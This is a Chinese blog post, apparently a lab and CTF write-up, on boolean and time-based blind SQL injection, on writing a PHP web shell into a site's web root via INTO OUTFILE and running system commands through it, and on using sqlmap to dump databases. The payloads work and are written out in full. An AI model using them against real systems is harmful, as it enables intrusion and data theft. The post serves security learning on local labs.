<!DOCTYPE html>
<html lang="en">
<head>

    <!--[if lt IE 9]>
        <style>body {display: none; background: none !important} </style>
        <meta http-equiv="Refresh" Content="0; url=//outdatedbrowser.com/" />
    <![endif]-->

<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<meta name="format-detection" content="telephone=no" />
<meta name="author" content="Tangxianshen" />



<meta name="description" content="布尔盲注实例以ctf_show第四关为例。按下F12，获得一个get请求的api，打开postman。能够得到对应的json，说明是一个api。这里id&#x3D;1’and 1&#x3D;2– -正常回显结果为空，id&#x3D;1’and 1&#x3D;1– -正常回显显示id&#x3D;1的结果。闭合之后再去进行测试，否则就会报错。查询数据库开头第一个字母是不是r。这里直接用大于，小于进行判">
<meta property="og:type" content="article">
<meta property="og:title" content="布尔盲注实例,时间盲注,控制网站,sqlmap工具的使用。">
<meta property="og:url" content="http://example.com/2023/12/25/%E5%B8%83%E5%B0%94%E7%9B%B2%E6%B3%A8%E5%AE%9E%E4%BE%8B,%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8,%E6%8E%A7%E5%88%B6%E7%BD%91%E7%AB%99,sqlmap%E5%B7%A5%E5%85%B7%E7%9A%84%E4%BD%BF%E7%94%A8%E3%80%82/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="布尔盲注实例以ctf_show第四关为例。按下F12，获得一个get请求的api，打开postman。能够得到对应的json，说明是一个api。这里id&#x3D;1’and 1&#x3D;2– -正常回显结果为空，id&#x3D;1’and 1&#x3D;1– -正常回显显示id&#x3D;1的结果。闭合之后再去进行测试，否则就会报错。查询数据库开头第一个字母是不是r。这里直接用大于，小于进行判">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703336220310-3b06d9b1-f7d9-45cf-ad4d-2fb84b70ff8c.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703336527700-822decb6-3af5-45dd-83a7-500fe0365ecc.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703336628436-88ce6077-76d9-4f82-9d57-961d52f85995.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703336779190-dd2add20-fded-4eba-a29c-713b0487b5d6.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703336956891-e3a23c56-b453-49aa-9e42-996761ce33b2.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703337091145-af09b1bf-9ae4-493b-9c01-57adf7aa16d1.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703337171574-3d6cb69a-a4ab-47d4-aa8e-f3547d33ceb7.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703337382530-be78a147-5d62-48be-a0cb-ccbd2cd10e4b.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703337442770-1dde82ed-40c6-44ae-9677-2d8ce28663ef.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703337567904-eba06dea-13a2-489e-9a61-e1749d43c882.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703337803267-9b63546b-3658-48aa-9189-de4fa15c67e0.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703338043250-a585c80f-9ef0-4f5d-b165-c6f8edee5062.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703338331066-1cf077e6-d634-4d18-9d68-0cb9891fb38e.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703339284198-ed4ba48a-3d65-4cbe-b0cc-392fe6b84ccb.png">
<meta property="og:image" content="https://cdn.nlark.com/yuque/0/2023/png/40666686/1703340391273-4889aeb1-96ad-4d10-9579-56a30ca842e4.png#averageHue=%23a06535&clientId=uf5688ffd-8341-4&from=paste&height=767&id=udd28eeed&originHeight=1055&originWidth=1597&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=356293&status=done&style=none&taskId=u85575a95-70c1-4222-92a3-dad2d477a98&title=&width=1161.4545454545455">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703340416426-3ea97461-54a6-4dad-82e8-d0a528eab24d.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703340700798-738fe349-b140-4e16-9e99-2117bbd7f5e8.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703341500246-d1f888c3-d9b8-4a76-a49c-8aaea7c9629b.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703341693015-72840272-40f7-411c-abc7-5b0f52356f5f.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703341872977-3d8d342a-bbf5-45a7-88e8-75fc610e8aae.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703343490023-5a004dbb-1deb-4a6f-8bae-3be68f12774a.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703342429374-71359c2d-3daf-45e6-b70a-dcc96aff40e3.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703342328099-4e9cee26-7456-432c-9893-cfb08f1cc290.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703343632508-e42536c9-b428-4a38-8f7d-85936e9eefbf.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703343789595-202e1326-e6fd-48e4-b0fb-3ba356e65b71.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703343915907-1d88aa82-691c-4cb1-b29e-86221a30ffcd.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703343789845-e2bc6636-8695-4887-828a-48edecba3c0e.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703345566426-f9bc4e34-2be5-4552-aeb8-915d7a55f9ee.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703345836431-388137f0-bf58-4684-a28a-c2309816ae94.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703345978463-5dfb765f-f135-4f62-83b6-b35e90a638a6.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703346083484-54bf6d01-2b2a-400e-a58f-27c6a05420e1.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703347187990-4fe88393-9217-424c-abd5-b8ca5c7f75b0.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703347331454-18708817-f96b-46b7-a1dc-8de87609a6bd.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703347434256-fc9fa70d-f5c5-4769-9c49-bc780f5c420a.png">
<meta property="og:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703348000344-f1b633df-d235-48ea-aa19-c5b37be8ef63.png">
<meta property="article:published_time" content="2023-12-25T01:03:21.000Z">
<meta property="article:modified_time" content="2024-01-08T02:04:15.540Z">
<meta property="article:author" content="Tangxianshen">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703336220310-3b06d9b1-f7d9-45cf-ad4d-2fb84b70ff8c.png">

<link rel="apple-touch-icon" href= "/apple-touch-icon.png">


    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">



    <link rel="shortcut icon" href="/favicon.png">



    <link href="//cdn.bootcss.com/animate.css/3.5.1/animate.min.css" rel="stylesheet">



    <link href="//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.css" rel="stylesheet">



    <script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
    <link href="//cdn.bootcss.com/pace/1.0.2/themes/blue/pace-theme-minimal.css" rel="stylesheet">



<link rel="stylesheet" href="/css/style.css">




<link href="//cdn.bootcss.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet">


<title>布尔盲注实例,时间盲注,控制网站,sqlmap工具的使用。 | Hexo</title>

<script src="//cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>

<script>
    var yiliaConfig = {
        fancybox: true,
        animate: true,
        isHome: false,
        isPost: true,
        isArchive: false,
        isTag: false,
        isCategory: false,
        fancybox_js: "//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.js",
        scrollreveal: "//cdn.bootcss.com/scrollReveal.js/3.1.4/scrollreveal.min.js",
        search: false
    }
</script>


    <script> yiliaConfig.jquery_ui = [false]; </script>



    <script> yiliaConfig.rootUrl = "\/";</script>






<meta name="generator" content="Hexo 6.3.0"></head>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            <img src="/img/R-C.jpg" class="animated zoomIn">
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/"></a></h1>
        </hgroup>

        

        


        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>Menu</li>
                        <li>Tags</li>
                        
                        <li>Friends</li>
                        
                        
                        <li>About Me</li>
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/">主页</a></li>
                        
                            <li><a href="/archives/">所有文章</a></li>
                        
                            <li><a href="/tags/">标签云</a></li>
                        
                            <li><a href="/about/">关于我</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" href="mailto:123@123.com" title="Email"></a>
                            
                                <a class="fa GitHub" href="#" title="GitHub"></a>
                            
                                <a class="fa RSS" href="/atom.xml" title="RSS"></a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/Python/" rel="tag">Python</a></li></ul>
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a class="main-nav-link switch-friends-link" target="_blank" rel="noopener" href="https://hexo.io">Hexo</a>
                    
                      <a class="main-nav-link switch-friends-link" target="_blank" rel="noopener" href="https://pages.github.com/">GitHub</a>
                    
                      <a class="main-nav-link switch-friends-link" target="_blank" rel="noopener" href="http://moxfive.xyz/">MOxFIVE</a>
                    
                    </div>
                </section>
                

                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">专注于前端</div>
                </section>
                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页"></a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                <img src="/img/R-C.jpg" class="animated zoomIn">
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页"></a></h1>
            </hgroup>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">主页</a></li>
                
                    <li><a href="/archives/">所有文章</a></li>
                
                    <li><a href="/tags/">标签云</a></li>
                
                    <li><a href="/about/">关于我</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" target="_blank" href="mailto:123@123.com" title="Email"></a>
                            
                                <a class="fa GitHub" target="_blank" href="#" title="GitHub"></a>
                            
                                <a class="fa RSS" target="_blank" href="/atom.xml" title="RSS"></a>
                            
                        </ul>
            </nav>
        </header>                
    </div>
    <link class="menu-list" tags="Tags" friends="Friends" about="About Me"/>
</nav>
      <div class="body-wrap"><article id="post-布尔盲注实例,时间盲注,控制网站,sqlmap工具的使用。" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2023/12/25/%E5%B8%83%E5%B0%94%E7%9B%B2%E6%B3%A8%E5%AE%9E%E4%BE%8B,%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8,%E6%8E%A7%E5%88%B6%E7%BD%91%E7%AB%99,sqlmap%E5%B7%A5%E5%85%B7%E7%9A%84%E4%BD%BF%E7%94%A8%E3%80%82/" class="article-date">
      <time datetime="2023-12-25T01:03:21.000Z" itemprop="datePublished">2023-12-25</time>
</a>


    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      布尔盲注实例,时间盲注,控制网站,sqlmap工具的使用。
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        

        
        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <h2 id="布尔盲注实例"><a href="#布尔盲注实例" class="headerlink" title="布尔盲注实例"></a>布尔盲注实例</h2><p>以ctf_show第四关为例。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703336220310-3b06d9b1-f7d9-45cf-ad4d-2fb84b70ff8c.png" alt="image.png"><br>按下F12，获得一个get请求的api，打开postman。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703336527700-822decb6-3af5-45dd-83a7-500fe0365ecc.png" alt="image.png"><br>能够得到对应的json，说明是一个api。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703336628436-88ce6077-76d9-4f82-9d57-961d52f85995.png" alt="image.png"><br>这里id&#x3D;1’and 1&#x3D;2– -正常回显结果为空，id&#x3D;1’and 1&#x3D;1– -正常回显显示id&#x3D;1的结果。闭合之后再去进行测试，否则就会报错。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703336779190-dd2add20-fded-4eba-a29c-713b0487b5d6.png" alt="image.png"><br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703336956891-e3a23c56-b453-49aa-9e42-996761ce33b2.png" alt="image.png" style="zoom:50%;" /><br>查询数据库开头第一个字母是不是r。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703337091145-af09b1bf-9ae4-493b-9c01-57adf7aa16d1.png" alt="image.png" style="zoom:50%;" /><br>这里直接用大于，小于进行判断第一个首字母。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703337171574-3d6cb69a-a4ab-47d4-aa8e-f3547d33ceb7.png" alt="image.png"><br>直接换成昨天写好的布尔盲注的脚本，url换成该题目的api。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703337382530-be78a147-5d62-48be-a0cb-ccbd2cd10e4b.png" alt="image.png"><br>因为输入id&#x3D;1结果会出现admin，在if这里可以输入admin。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703337442770-1dde82ed-40c6-44ae-9677-2d8ce28663ef.png" alt="image.png"><br>输出结果正常<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703337567904-eba06dea-13a2-489e-9a61-e1749d43c882.png" alt="image.png"><br>之后就去各个去爆就好了，爆表，爆字段这些：<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703337803267-9b63546b-3658-48aa-9189-de4fa15c67e0.png" alt="image.png"><br>flag结果展示：<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703338043250-a585c80f-9ef0-4f5d-b165-c6f8edee5062.png" alt="image.png"><br>运行与调试<br>可以查看到每一步代码的运行过程。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703338331066-1cf077e6-d634-4d18-9d68-0cb9891fb38e.png" alt="image.png"></p>
<h2 id="时间盲注-睡眠盲注"><a href="#时间盲注-睡眠盲注" class="headerlink" title="时间盲注(睡眠盲注)"></a>时间盲注(睡眠盲注)</h2><p>发现不管输入什么都是直接显示。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703339284198-ed4ba48a-3d65-4cbe-b0cc-392fe6b84ccb.png" alt="image.png"></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">id=<span class="number">1</span><span class="string">&#x27;and If(ascii(substr(database(),1,1))=115,1,sleep(5))-- -#三元运算，第一个表示条件，第二个1表示成功的时候，sleep(5)表示失败就休息</span></span><br><span class="line"><span class="string">SELECT BENCHMARK(1000000, SHA1(&#x27;</span>Hello World<span class="string">&#x27;));</span></span><br><span class="line"><span class="string">id=1&#x27;</span> <span class="keyword">and</span> <span class="title function_ invoke__">If</span>(<span class="title function_ invoke__">ascii</span>(<span class="title function_ invoke__">substr</span>(<span class="title function_ invoke__">database</span>(),<span class="number">1</span>,<span class="number">1</span>))=<span class="number">114</span>,<span class="number">1</span>,<span class="title function_ invoke__">BENCHMARK</span>(<span class="number">5000000</span>, <span class="title function_ invoke__">SHA1</span>(<span class="string">&#x27;Hello World&#x27;</span>)))-- -</span><br></pre></td></tr></table></figure>

<p>可以看到当&#x3D;115时马上就显示<br><img src="https://cdn.nlark.com/yuque/0/2023/png/40666686/1703340391273-4889aeb1-96ad-4d10-9579-56a30ca842e4.png#averageHue=%23a06535&clientId=uf5688ffd-8341-4&from=paste&height=767&id=udd28eeed&originHeight=1055&originWidth=1597&originalType=binary&ratio=1.25&rotation=0&showTitle=false&size=356293&status=done&style=none&taskId=u85575a95-70c1-4222-92a3-dad2d477a98&title=&width=1161.4545454545455" alt="image.png"><br>可以看到当&#x3D;114时一直处于加载状态，之后才出现结果。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703340416426-3ea97461-54a6-4dad-82e8-d0a528eab24d.png" alt="image.png"><br>直接用时间盲注的脚本。<br><a target="_blank" rel="noopener" href="https://www.yuque.com/attachments/yuque/0/2023/py/40666686/1703340795579-30954cd2-23f9-4ad7-9ee5-b0955881ea07.py?_lake_card=%7B%22src%22:%22https://www.yuque.com/attachments/yuque/0/2023/py/40666686/1703340795579-30954cd2-23f9-4ad7-9ee5-b0955881ea07.py%22,%22name%22:%22%E6%97%B6%E5%BB%B6%E7%9B%B2%E6%B3%A81.py%22,%22size%22:2046,%22ext%22:%22py%22,%22source%22:%22%22,%22status%22:%22done%22,%22download%22:true,%22taskId%22:%22u208a619b-6db5-499f-8692-33414b57f10%22,%22taskType%22:%22upload%22,%22type%22:%22text/x-python%22,%22__spacing%22:%22both%22,%22mode%22:%22title%22,%22id%22:%22ua29a5379%22,%22margin%22:%7B%22top%22:true,%22bottom%22:true%7D,%22card%22:%22file%22%7D">时延盲注1.py</a><br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703340700798-738fe349-b140-4e16-9e99-2117bbd7f5e8.png" alt="image.png"></p>
<h2 id="控制网站"><a href="#控制网站" class="headerlink" title="控制网站"></a>控制网站</h2><p>?id&#x3D;-1’ union select 1,@@datadir,3– -显示phpstudy的网站根目录。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703341500246-d1f888c3-d9b8-4a76-a49c-8aaea7c9629b.png" alt="image.png"><br>secure_file_priv&#x3D;””将这段代码放入my.ini的[client]的上一行。这个文本的位置在phpstudy的设置中，点击配置文件，mysql.ini。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703341693015-72840272-40f7-411c-abc7-5b0f52356f5f.png" alt="image.png"><br>之后输入这段代码：<br>?id&#x3D;-1’ union select 1,@@datadir,@@secure_file_priv – -，password这里显示为空说明可以注入，在没有这个secure_file_priv&#x3D;””时password显示的是NULL。NULL代表不能在任何地方注入文件。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703341872977-3d8d342a-bbf5-45a7-88e8-75fc610e8aae.png" alt="image.png"><br>?id&#x3D;-1’ union select 1,@@datadir,”<?php ,phpinfo()  ?>“ into outfile “C:\phpstudy_pro\WWW\phpinfo.php” – -<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703343490023-5a004dbb-1deb-4a6f-8bae-3be68f12774a.png" alt="image.png"><br>此时在www的根目录下产生了phpinfo.php。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703342429374-71359c2d-3daf-45e6-b70a-dcc96aff40e3.png" alt="image.png"><br>?id&#x3D;-1’ union select 1,@@datadir,”<?php @system($_GET[a]);  ?>“ into outfile “C:\phpstudy_pro\WWW\tfk.php” – -#在windows中用&#x2F;&#x2F;表示&#x2F;。第一个&#x2F;表示转义符，两个&#x2F;才能表示本身的含义。system表示系统命令执行函数，这个函数通过get参数进行执行，创造了一个webshell后台。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703342328099-4e9cee26-7456-432c-9893-cfb08f1cc290.png"><br>打开网站输入?a&#x3D;dir<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703343632508-e42536c9-b428-4a38-8f7d-85936e9eefbf.png" alt="image.png"><br>打开网站输入?a&#x3D;whoami<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703343789595-202e1326-e6fd-48e4-b0fb-3ba356e65b71.png" alt="image.png"><br>打开网站输入?a&#x3D;systeminfo输出系统的基本信息<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703343915907-1d88aa82-691c-4cb1-b29e-86221a30ffcd.png" alt="image.png"></p>
<h2 id="sqlmap的使用"><a href="#sqlmap的使用" class="headerlink" title="sqlmap的使用"></a>sqlmap的使用</h2><h2 id="sqlmap的使用-1"><a href="#sqlmap的使用-1" class="headerlink" title="sqlmap的使用"></a>sqlmap的使用</h2><p>1.下载sqlmap的压缩包，附件如下<br><a target="_blank" rel="noopener" href="https://www.yuque.com/attachments/yuque/0/2023/zip/40675946/1703343149028-fd98a004-40af-43ea-8d01-d839d12e226e.zip?_lake_card=%7B%22src%22:%22https://www.yuque.com/attachments/yuque/0/2023/zip/40675946/1703343149028-fd98a004-40af-43ea-8d01-d839d12e226e.zip%22,%22name%22:%22sqlmap-1.7.zip%22,%22size%22:7517702,%22ext%22:%22zip%22,%22source%22:%22%22,%22status%22:%22done%22,%22download%22:true,%22taskId%22:%22u7f82c97a-84fe-4940-8dea-2928843d8c0%22,%22taskType%22:%22upload%22,%22type%22:%22application/x-zip-compressed%22,%22__spacing%22:%22both%22,%22id%22:%22ua927c838%22,%22margin%22:%7B%22top%22:true,%22bottom%22:true%7D,%22card%22:%22file%22%7D">sqlmap-1.7.zip</a><br>2.在解压缩后的sqlmap文件夹的路径下输入cmd,进入命令行模式。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703343789845-e2bc6636-8695-4887-828a-48edecba3c0e.png" alt="image.png"><br>3.输入<code>sqlmap -h</code>可以查看sqlmap的帮助信息和参数列表，以便正确使用该工具执行各种SQL注入测试和攻击。<br>4.因为主机上执行sqlmap命令时产生了奇怪的报错，转用虚拟机。以sqli的第一关为例，保证虚拟机win10hei和kali都是桥接模式，保证他俩的IP地址在同一网段。在kali的命令行输入爆库命令<code> sqlmap  -u &quot;[http://192.168.2.118/sqli/Less-1/?id=1&quot;](http://192.168.2.70/sqli/Less-1/?id=1&quot;) --dbs</code>，得到库名。注意192.168.2.118是win10hei的IP地址。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703345566426-f9bc4e34-2be5-4552-aeb8-915d7a55f9ee.png" alt="image.png"><br>5.输入爆表命令：<code>sqlmap  -u &quot;[http://192.168.2.118/sqli/Less-1/?id=1&quot;](http://192.168.2.70/sqli/Less-1/?id=1&quot;)  --batch -D security --tables</code><br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703345836431-388137f0-bf58-4684-a28a-c2309816ae94.png" alt="image.png"><br>6.输入爆字段名命令<code>sqlmap  -u &quot;[http://192.168.2.118/sqli/Less-1/?id=1&quot;](http://192.168.2.70/sqli/Less-1/?id=1&quot;)   --batch -D security -T users --columns</code><br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703345978463-5dfb765f-f135-4f62-83b6-b35e90a638a6.png" alt="image.png"><br>7.输入爆字段命令<code>sqlmap  -u &quot;[http://192.168.2.118/sqli/Less-1/?id=1&quot;](http://192.168.2.70/sqli/Less-1/?id=1&quot;)    --batch -D security -T users -C &quot;id,username&quot; --dump</code><br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703346083484-54bf6d01-2b2a-400e-a58f-27c6a05420e1.png" alt="image.png">post请求：<br>以第11关为例：<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703347187990-4fe88393-9217-424c-abd5-b8ca5c7f75b0.png" alt="image.png"><br>打开yakit免配置启动。<br>输入虚拟机的ip地址进入第11关。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703347331454-18708817-f96b-46b7-a1dc-8de87609a6bd.png" alt="image.png"><br>用yakit进行抓包发送到web fuzzer<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703347434256-fc9fa70d-f5c5-4769-9c49-bc780f5c420a.png" alt="image.png"><br>将1.txt保存下来存在sqlmap的上一级目录中<br>输入命令：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">python sqlmap.py -r <span class="string">&quot;../1.txt&quot;</span>  --dbs --batch</span><br><span class="line">增加等级与风险：  python sqlmap.py -r <span class="string">&quot;../1.txt&quot;</span>  --dbs --batch --level=<span class="number">5</span> --risk=<span class="number">3</span></span><br></pre></td></tr></table></figure>

<p>此时爆出数据库。<br><img src="https://raw.githubusercontent.com/Xiaotang23/tu/main/img/1703348000344-f1b633df-d235-48ea-aa19-c5b37be8ef63.png" alt="image.png"></p>

      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>Title:</span><a href="/2023/12/25/%E5%B8%83%E5%B0%94%E7%9B%B2%E6%B3%A8%E5%AE%9E%E4%BE%8B,%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8,%E6%8E%A7%E5%88%B6%E7%BD%91%E7%AB%99,sqlmap%E5%B7%A5%E5%85%B7%E7%9A%84%E4%BD%BF%E7%94%A8%E3%80%82/">布尔盲注实例,时间盲注,控制网站,sqlmap工具的使用。</a></p>
        <p><span>Author:</span><a href="/" title="Back to Homepage"></a></p>
        <p><span>Created:</span>2023-12-25, 09:03:21</p>
        <p><span>Updated:</span>2024-01-08, 10:04:15</p>
        <p>
            <span>Full URL:</span><a class="post-url" href="/2023/12/25/%E5%B8%83%E5%B0%94%E7%9B%B2%E6%B3%A8%E5%AE%9E%E4%BE%8B,%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8,%E6%8E%A7%E5%88%B6%E7%BD%91%E7%AB%99,sqlmap%E5%B7%A5%E5%85%B7%E7%9A%84%E4%BD%BF%E7%94%A8%E3%80%82/" title="布尔盲注实例,时间盲注,控制网站,sqlmap工具的使用。">http://example.com/2023/12/25/%E5%B8%83%E5%B0%94%E7%9B%B2%E6%B3%A8%E5%AE%9E%E4%BE%8B,%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8,%E6%8E%A7%E5%88%B6%E7%BD%91%E7%AB%99,sqlmap%E5%B7%A5%E5%85%B7%E7%9A%84%E4%BD%BF%E7%94%A8%E3%80%82/</a>
            <span class="copy-path" data-clipboard-text="From http://example.com/2023/12/25/%E5%B8%83%E5%B0%94%E7%9B%B2%E6%B3%A8%E5%AE%9E%E4%BE%8B,%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8,%E6%8E%A7%E5%88%B6%E7%BD%91%E7%AB%99,sqlmap%E5%B7%A5%E5%85%B7%E7%9A%84%E4%BD%BF%E7%94%A8%E3%80%82/　　By " title="Copy Article&#39;s Link &amp; Author"><i class="fa fa-clipboard"></i></span>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>License:</span><i class="fa fa-creative-commons"></i> <a rel="license noopener" target="_blank" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" title="CC BY-NC-SA 4.0 International" target = "_blank">"CC BY-NC-SA 4.0"</a> Keep Link &amp; Author if Distribute.
        </p>
    </div>



    <nav id="article-nav">
        
            <div id="article-nav-newer" class="article-nav-title">
